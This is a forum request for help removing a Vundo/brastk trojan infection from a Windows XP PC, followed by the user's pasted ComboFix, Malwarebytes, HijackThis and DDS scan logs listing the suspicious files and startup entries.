
Trojan.Vundo.H / Brastk / Rootkitted and keep getting re-infected.



I keep essentially getting re-infected. I had Spybot S&D on; I've disabled that and all other anti-virus solutions that run as a monitor, and have attempted running ComboFix.

ComboFix has solved some of the problems, but certain items keep going into my startup (via msconfig):

c:\windows\system32\brastk.exe

rundll32.exe "C:\WINDOWS\system32\wuyamoba.dll", b

keep running, and basically unless I directly type a URL into the browser I get taken to a slew of other websites (some of which say "hey, wait 10 seconds while we try to install more malware").

Your help would be greatly appreciated!

ComboFix Log:

ComboFix 09-03-06.02 - Zack 2009-03-09 0:43:23.15 - NTFSx86

Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1023.620 [GMT -5:00]

Running from: c:\documents and settings\Zack\Desktop\ComboFix.exe

AV: Norton AntiVirus *On-access scanning disabled* (Updated)

AV: Trend Micro PC-cillin Internet Security 2006 *On-access scanning disabled* (Outdated)

FW: Trend Micro PC-cillin Internet Security (Firewall) *disabled*

.

((((((((((((((((((((((((( Files Created from 2009-02-09 to 2009-03-09 )))))))))))))))))))))))))))))))

.

2009-03-08 23:56 . 2009-03-08 23:56 <DIR> d-------- c:\documents and settings\Administrator\Application Data\Malwarebytes

2009-03-07 20:54 . 2009-03-07 20:54 <DIR> d-------- c:\documents and settings\Zack\Application Data\Malwarebytes

2009-03-07 20:53 . 2009-02-11 11:19 38,496 --a------ c:\windows\system32\drivers\mbamswissarmy.sys

2009-03-07 20:53 . 2009-02-11 11:19 15,504 --a------ c:\windows\system32\drivers\mbam.sys

2009-03-07 09:42 . 2009-03-07 09:42 <DIR> d-------- c:\documents and settings\All Users\Application Data\Symantec

2009-03-07 09:38 . 2009-03-07 09:37 36,272 -ra------ c:\windows\system32\drivers\SymIM.sys

2009-03-07 09:37 . 2009-03-07 09:37 <DIR> d-------- c:\program files\Symantec

2009-03-07 09:37 . 2009-03-07 09:52 <DIR> d-------- c:\program files\Common Files\Symantec Shared

2009-03-07 09:37 . 2009-03-07 09:37 124,464 --a------ c:\windows\system32\drivers\SYMEVENT.SYS

2009-03-07 09:37 . 2009-03-07 09:37 60,808 --a------ c:\windows\system32\S32EVNT1.DLL

2009-03-07 09:37 . 2009-03-07 09:37 10,635 --a------ c:\windows\system32\drivers\SYMEVENT.CAT

2009-03-07 09:37 . 2009-03-07 09:37 806 --a------ c:\windows\system32\drivers\SYMEVENT.INF

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\windows\system32\drivers\NAV

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\Windows Sidebar

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\NortonInstaller

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\Norton AntiVirus

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\documents and settings\All Users\Application Data\NortonInstaller

2009-03-07 09:36 . 2009-03-07 09:41 <DIR> d-------- c:\documents and settings\All Users\Application Data\Norton

2009-03-07 07:11 . 2009-03-07 07:07 13,588 --a------ c:\windows\system32\wpa.dbl.bak

2009-03-07 07:08 . 2009-03-09 00:38 104 --a------ c:\windows\system32\NvApps.xml

2009-03-07 06:52 . 2009-03-09 00:38 13,588 --a------ c:\windows\system32\wpa.dbl

2009-03-07 04:23 . 2007-11-14 19:48 102,664 --a------ c:\windows\system32\drivers\tmcomm.sys

2009-03-04 23:57 . 2009-03-05 20:01 <DIR> d-------- c:\program files\eFile Express 2008

2009-03-03 04:48 . 2009-03-03 04:56 <DIR> d-------- C:\cygwin

2009-02-20 02:10 . 2009-02-20 02:10 966 --a------ c:\windows\STBC_DEMO.ini

2009-02-20 00:54 . 2009-02-20 00:54 <DIR> d-------- c:\documents and settings\All Users\Application Data\nView_Profiles

2009-02-20 00:41 . 2009-02-20 00:41 107 --a------ c:\windows\pccillin.ini

.

(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2009-03-09 05:41 --------- d-----w c:\program files\MySpace

2009-03-09 05:38 --------- d-----w c:\program files\Steam

2009-03-09 05:34 --------- d-----w c:\program files\Mozilla Thunderbird

2009-03-09 05:32 --------- d-----w c:\program files\BitTorrent

2009-03-09 02:24 --------- d---a-w c:\documents and settings\All Users\Application Data\TEMP

2009-03-09 02:24 --------- d-----w c:\program files\zMUD

2009-03-08 01:53 --------- d-----w c:\program files\Malwarebytes' Anti-Malware

2009-03-08 00:13 84,992 --sha-w c:\windows\system32\nelesoye.dll

2009-03-08 00:13 79,872 --sha-w c:\windows\system32\wuyamoba.dll

2009-03-07 09:51 --------- d-----w c:\program files\Spybot - Search & Destroy

2009-03-07 09:49 --------- d-----w c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy

2009-03-05 04:57 --------- d-----w c:\program files\eFile Express 2007

2009-02-25 21:42 --------- d-----w c:\documents and settings\Zack\Application Data\BitTorrent

2009-02-25 19:06 --------- d-----w c:\program files\Trillian

2009-02-20 07:09 --------- d-----w c:\program files\Activision

2009-02-05 02:46 --------- d-----w c:\program files\Alliance

2009-02-05 01:55 --------- d-----w c:\program files\SystemRequirementsLab

2009-02-05 01:55 --------- d-----w c:\documents and settings\Zack\Application Data\SystemRequirementsLab

2009-02-03 05:51 --------- d-----w c:\program files\ATITool

2009-02-03 03:02 --------- d--h--w c:\program files\InstallShield Installation Information

2009-02-03 03:02 --------- d-----w c:\program files\Intel

2009-02-02 22:44 --------- d-----w c:\documents and settings\Zack\Application Data\OpenOffice.org2

2009-01-13 02:40 137,688 ----a-w c:\windows\system32\drivers\PnkBstrK.sys

2009-01-13 02:39 202,040 ----a-w c:\windows\system32\PnkBstrB.exe

2009-01-09 19:30 --------- d-----w c:\program files\MultipleIEs

2008-12-20 23:15 826,368 ----a-w c:\windows\system32\wininet.dll

2007-10-20 00:56 479,232 ----a-w c:\program files\mozilla firefox\plugins\msvcm80.dll

2007-10-20 00:56 548,864 ----a-w c:\program files\mozilla firefox\plugins\msvcp80.dll

2007-10-20 00:56 626,688 ----a-w c:\program files\mozilla firefox\plugins\msvcr80.dll

2007-01-13 05:24 952 --sha-w c:\windows\system32\KGyGaAvL.sys

.

((((((((((((((((((((((((((((( SnapShot_2009-03-07_ 3.53.03.75 )))))))))))))))))))))))))))))))))))))))))

.

- 2005-10-21 02:02:28 163,328 ----a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE

+ 2005-10-21 01:02:28 163,328 ----a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE

- 2000-08-31 14:00:00 29,696 ----a-w c:\windows\NIRCMD.exe

+ 2000-08-31 13:00:00 29,696 ----a-w c:\windows\NIRCMD.exe

- 2000-08-31 14:00:00 161,792 ----a-w c:\windows\SWREG.exe

+ 2000-08-31 13:00:00 161,792 ----a-w c:\windows\SWREG.exe

+ 2009-03-07 14:37:07 255,536 ----a-w c:\windows\system32\drivers\NAV\1002000.007\BHDrvx86.sys

+ 2009-03-07 14:37:07 362,544 ----a-w c:\windows\system32\drivers\NAV\1002000.007\cchpx86.sys

+ 2009-03-07 14:37:09 306,736 ----a-w c:\windows\system32\drivers\NAV\1002000.007\srtsp.sys

+ 2009-03-07 14:37:09 43,696 ----a-w c:\windows\system32\drivers\NAV\1002000.007\srtspx.sys

+ 2009-03-07 14:37:09 12,976 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symdns.sys

+ 2009-03-07 14:37:09 309,296 ----a-w c:\windows\system32\drivers\NAV\1002000.007\SymEFA.sys

+ 2009-03-07 14:37:09 89,904 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symfw.sys

+ 2009-03-07 14:37:09 34,608 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symids.sys

+ 2009-03-07 14:37:09 37,424 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symndis.sys

+ 2009-03-07 14:37:09 40,496 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symndisv.sys

+ 2009-03-07 14:37:09 24,624 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symredrv.sys

+ 2009-03-07 14:37:09 198,192 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symtdi.sys

- 2008-11-12 19:17:13 66,960 ----a-w c:\windows\system32\perfc009.dat

+ 2009-03-08 08:19:17 66,960 ----a-w c:\windows\system32\perfc009.dat

- 2008-11-12 19:17:13 414,032 ----a-w c:\windows\system32\perfh009.dat

+ 2009-03-08 08:19:18 414,032 ----a-w c:\windows\system32\perfh009.dat

+ 2009-03-09 05:38:05 16,384 ----atw c:\windows\temp\Perflib_Perfdata_470.dat

.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))

.

.

*Note* empty entries & legit default entries are not shown

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Steam"="c:\program files\steam\steam.exe" [2008-10-16 1410296]

"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-04 15360]

"brastk"="c:\windows\system32\brastk.exe" [bU]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"QuickTime Task"="c:\program files\QuickTime\qttask.exe" [2008-05-27 413696]

"IMONTRAY"="c:\program files\Intel\Intel® Active Monitor\imontray.exe" [2005-05-02 32768]

"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-05-16 13529088]

"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-05-16 86016]

"nugubinuvi"="c:\windows\system32\yuhasifo.dll" [bU]

"nwiz"="nwiz.exe" [2008-05-16 c:\windows\system32\nwiz.exe]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]

"vidc.ffds"= c:\progra~1\COMBIN~1\Filters\FFDShow\ff_vfw.dll

"aux1"= ctwdm32.dll

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Acrobat Assistant.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\Acrobat Assistant.lnk

backup=c:\windows\pss\Acrobat Assistant.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma Loader.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk

backup=c:\windows\pss\Adobe Gamma Loader.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk

backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\3c43874c]

--ahs---- 2009-03-07 19:13 79872 c:\windows\system32\wuyamoba.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acrobat Assistant 8.0]

--a------ 2008-01-11 19:54 623992 c:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe_ID0EYTHM]

--a------ 2007-03-20 17:40 1884160 c:\progra~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]

--a------ 2008-07-10 09:47 116040 c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}]

--a------ 2006-10-09 12:28 139264 c:\program files\Common Files\Ahead\Lib\NMBgMonitor.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]

--a------ 2004-08-04 02:56 15360 c:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]

--a------ 2004-09-13 15:49 49152 c:\program files\HP\HP Software Update\hpwuSchd2.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]

--a------ 2008-07-30 10:47 289064 c:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]

--a------ 2006-01-12 17:40 155648 c:\program files\Common Files\Ahead\Lib\NeroCheck.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\pccguide.exe]

--a------ 2006-03-08 13:30 897089 c:\program files\Trend Micro\Internet Security 2006\pccguide.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWRISOVM.EXE]

--a------ 2006-11-06 03:27 200704 c:\program files\PowerISO\PWRISOVM.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]

--a------ 2008-05-27 10:50 413696 c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VirtualCloneDrive]

--a------ 2006-04-29 08:21 94208 c:\program files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BluetoothAuthenticationAgent]

--a------ 2004-08-04 02:56 110592 c:\windows\system32\bthprops.cpl

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]

"ATI Smart"=2 (0x2)

"AVG Anti-Spyware Guard"=2 (0x2)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]

"AntiVirusDisableNotify"=dword:00000001

"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\TrendAntiVirus]

"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\TrendFirewall]

"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]

"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"=

"c:\\Games\\FreeSpace2\\fs2_open_r_20060425_Kara.exe"=

"c:\\Program Files\\Visicom Media\\AceFTP 3 Freeware\\aceftp3free.exe"=

"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=

"c:\\Program Files\\mIRC\\mirc.exe"=

"c:\\Program Files\\MSN Messenger\\msnmsgr.exe"=

"c:\\Program Files\\MSN Messenger\\livecall.exe"=

"c:\\Program Files\\Common Files\\Adobe\\Adobe Version Cue CS3\\Server\\bin\\VersionCueCS3.exe"=

"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=

"c:\\Program Files\\iTunes\\iTunes.exe"=

"c:\\WINDOWS\\system32\\javaw.exe"=

"c:\\Program Files\\EditPlus 2\\editplus.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\call of duty 4\\iw3sp.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\call of duty 4\\iw3mp.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\bioshock\\Builds\\Release\\Bioshock.exe"=

"c:\\Program Files\\Trillian\\trillian.exe"=

"c:\\combofix\\NirCmd.cfexe"=

"c:\\WINDOWS\\system32\\devldr32.exe"=

"c:\\WINDOWS\\notepad.exe"=

"c:\\WINDOWS\\system32\\taskmgr.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]

"3703:TCP"= 3703:TCP:Adobe Version Cue CS3 Server

"3704:TCP"= 3704:TCP:Adobe Version Cue CS3 Server

"50900:TCP"= 50900:TCP:Adobe Version Cue CS3 Server

"50901:TCP"= 50901:TCP:Adobe Version Cue CS3 Server

R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\NAV\1002000.007\SymEFA.sys [2009-03-07 309296]

R1 BHDrvx86;Symantec Heuristics Driver;c:\windows\system32\drivers\NAV\1002000.007\BHDrvx86.sys [2009-03-07 255536]

R1 ccHP;Symantec Hash Provider;c:\windows\system32\drivers\NAV\1002000.007\cchpx86.sys [2009-03-07 362544]

R1 IDSxpx86;IDSxpx86;c:\documents and settings\All Users\Application Data\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\Definitions\IPSDefs\20090303.001\IDSxpx86.sys [2009-03-07 276344]

R1 vcdrom;Virtual CD-ROM Device Driver;c:\windows\system32\drivers\VCdRom.sys [2006-10-17 8576]

R2 Norton AntiVirus;Norton AntiVirus;c:\program files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe [2009-03-07 115560]

R2 Tmfilter;Tmfilter;c:\windows\system32\drivers\tmxpflt.sys [2005-11-09 197648]

R2 Tmpreflt;Tmpreflt;c:\windows\system32\drivers\tmpreflt.sys [2005-11-09 31248]

R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2009-03-07 101936]

R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2009-03-07 38496]

S2 Tmntsrv;Trend Micro Real-time Service;c:\progra~1\TRENDM~1\INTERN~1\Tmntsrv.exe [2006-03-08 340040]

S2 TmPfw;Trend Micro Personal Firewall;c:\progra~1\TRENDM~1\INTERN~1\TmPfw.exe [2006-03-15 634944]

S2 tmproxy;Trend Micro Proxy Service;c:\progra~1\TRENDM~1\INTERN~1\tmproxy.exe [2006-03-15 286791]

S3 ctgame;Game Port;c:\windows\system32\drivers\ctgame.sys [2006-09-14 19128]

S3 ICAM3NT5;Intel USB Video Camera III;c:\windows\system32\drivers\Icam3.sys [2006-09-13 141056]

--- Other Services/Drivers In Memory ---

*NewlyCreated* - MBAMSWISSARMY

.

Contents of the 'Scheduled Tasks' folder

2009-03-02 c:\windows\Tasks\AppleSoftwareUpdate.job

- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 12:34]

.

- - - - ORPHANS REMOVED - - - -

BHO-{fa59a23f-d93e-4c80-8122-076fc2f90f9a} - (no file)

HKCU-Run-BitTorrent - c:\program files\BitTorrent\bittorrent.exe

MSConfigStartUp-BitTorrent - c:\program files\BitTorrent\bittorrent.exe

MSConfigStartUp-MySpaceIM - c:\program files\MySpace\IM\MySpaceIM.exe

.

------- Supplementary Scan -------

.

uStart Page = hxxp://www.google.com

mStart Page = hxxp://www.google.com

IE: Append to existing PDF

IE: Convert link target to Adobe PDF

IE: Convert link target to existing PDF

IE: Convert selected links to Adobe PDF

IE: Convert selected links to existing PDF

IE: Convert selection to Adobe PDF

IE: Convert selection to existing PDF

IE: Convert to Adobe PDF

DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab

DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab

FF - ProfilePath - c:\documents and settings\Zack\Application Data\Mozilla\Firefox\Profiles\23knc70b.default\

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava11.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava12.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava13.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava14.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava32.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJPI150_06.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPOJI610.dll

FF - plugin: c:\program files\Mozilla Firefox\plugins\npbittorrent.dll

FF - plugin: c:\program files\Mozilla Firefox\plugins\NPTURNMED.dll

.

**************************************************************************

catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net

Rootkit scan 2009-03-09 00:46:31

Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully

hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Norton AntiVirus]

"ImagePath"="\"c:\program files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe\" /s \"Norton AntiVirus\" /m \"c:\program files\Norton AntiVirus\Engine\16.2.0.7\diMaster.dll\" /prefetch:1"

.

--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1244)

c:\windows\system32\Ati2evxx.dll

.

Completion time: 2009-03-09 0:56:31

ComboFix-quarantined-files.txt 2009-03-09 05:56:26

ComboFix2.txt 2009-03-09 04:58:26

ComboFix3.txt 2009-03-09 04:29:40

ComboFix4.txt 2009-03-08 02:29:22

ComboFix5.txt 2009-03-09 05:43:02

Pre-Run: 4,713,451,520 bytes free

Post-Run: 4,693,299,200 bytes free

269 --- E O F --- 2009-02-25 19:01:19

MBAM Log:

Malwarebytes' Anti-Malware 1.34

Database version: 1828

Windows 5.1.2600 Service Pack 2

3/9/2009 1:04:29 AM

mbam-log-2009-03-09 (01-04-29).txt

Scan type: Quick Scan

Objects scanned: 51028

Time elapsed: 4 minute(s), 45 second(s)

Memory Processes Infected: 0

Memory Modules Infected: 0

Registry Keys Infected: 0

Registry Values Infected: 0

Registry Data Items Infected: 0

Folders Infected: 0

Files Infected: 1

Memory Processes Infected:

(No malicious items detected)

Memory Modules Infected:

(No malicious items detected)

Registry Keys Infected:

(No malicious items detected)

Registry Values Infected:

(No malicious items detected)

Registry Data Items Infected:

(No malicious items detected)

Folders Infected:

(No malicious items detected)

Files Infected:

\Check for Quake III Arena Updates.exe (Trojan.Lop.H) -> Quarantined and deleted successfully.

HJT Log:

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 1:06:35 AM, on 3/9/2009

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16791)

Boot mode: Normal

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

C:\Program Files\Bonjour\mDNSResponder.exe

C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\system32\HPZipm12.exe

C:\WINDOWS\system32\PnkBstrA.exe

C:\WINDOWS\system32\PnkBstrB.exe

C:\WINDOWS\system32\svchost.exe

C:\Program Files\Intel\Intel® Active Monitor\imonnt.exe

C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

C:\Program Files\Intel\Intel® Active Monitor\imontray.exe

C:\WINDOWS\system32\RUNDLL32.EXE

C:\program files\steam\steam.exe

C:\WINDOWS\system32\devldr32.exe

C:\WINDOWS\system32\ctfmon.exe

C:\WINDOWS\system32\wscntfy.exe

C:\WINDOWS\system32\rundll32.exe

C:\Documents and Settings\Zack\Desktop\ATF-Cleaner.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrobat.exe

C:\WINDOWS\system32\taskmgr.exe

C:\Program Files\Mozilla Firefox\firefox.exe

C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe

C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE

C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe

C:\WINDOWS\system32\notepad.exe

C:\WINDOWS\explorer.exe

C:\WINDOWS\system32\NOTEPAD.EXE

C:\WINDOWS\system32\wuauclt.exe

C:\WINDOWS\system32\NOTEPAD.EXE

C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: Symantec Intrusion Prevention - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\IPSBHO.DLL

O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll

O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS3/contributeieplugin.dll

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [iMONTRAY] C:\Program Files\Intel\Intel® Active Monitor\imontray.exe

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} -

O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1158227831203

O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1166482132296

O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll (file missing)

O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe

O23 - Service: Adobe Version Cue CS3 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe

O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe

O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe

O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe

O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe

O23 - Service: Intel® Active Monitor (imonNT) - Intel Corp. - C:\Program Files\Intel\Intel® Active Monitor\imonnt.exe

O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe

O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe

O23 - Service: Norton AntiVirus - Symantec Corporation - C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe

O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe

O23 - Service: PnkBstrB - Unknown owner - C:\WINDOWS\system32\PnkBstrB.exe

O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe

O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe

O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe

O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

--

End of file - 5940 bytes

DDS.scr Attach / Log

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

DDS (Ver_09-02-01.01)

Microsoft Windows XP Professional

Boot Device: \Device\HarddiskVolume1

Install Date: 12/18/2006 4:38:48 PM

System Uptime: 3/8/2009 11:36:33 PM (2 hours ago)

Motherboard: Intel Corporation | | D875PBZ

Processor: Intel® Pentium® 4 CPU 2.80GHz | J2E1 | 2793/200mhz

Processor: Intel® Pentium® 4 CPU 2.80GHz | J2E1 | 2793/200mhz

==== Disk Partitions =========================

A: is Removable

C: is FIXED (NTFS) - 112 GiB total, 4.382 GiB free.

F: is CDROM (UDF)

G: is CDROM (CDFS)

H: is CDROM ()

==== Disabled Device Manager Items =============

==== System Restore Points ===================

RP19: 12/9/2008 3:38:37 PM - System Checkpoint

RP20: 12/10/2008 1:00:16 PM - Software Distribution Service 3.0

RP21: 12/11/2008 1:00:18 PM - Software Distribution Service 3.0

RP22: 12/12/2008 2:37:39 PM - System Checkpoint

RP23: 12/13/2008 2:37:57 PM - System Checkpoint

RP24: 12/14/2008 4:44:08 PM - System Checkpoint

